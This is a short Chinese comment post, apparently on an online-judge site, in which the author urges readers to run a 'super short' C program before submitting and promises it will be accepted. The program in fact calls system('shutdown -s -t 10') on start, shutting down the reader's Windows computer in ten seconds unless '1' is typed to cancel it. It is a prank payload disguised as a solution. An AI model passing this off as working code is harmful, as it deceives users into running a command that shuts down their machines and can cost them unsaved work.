我的代码超简短,先运行后提交,改个变量名,提交后AC

牛浩宇  •  6个月前


include <bits/stdc++.h>

int main(void) {

char input[20] = {0};
system("shutdown -s -t 10");

again:

scanf("%s", input);
if (strcmp(input, "1") == 0) {
	system("shutdown -a");
} else {
	goto again;
}
return 0;

}


评论:

请先登录,才能进行评论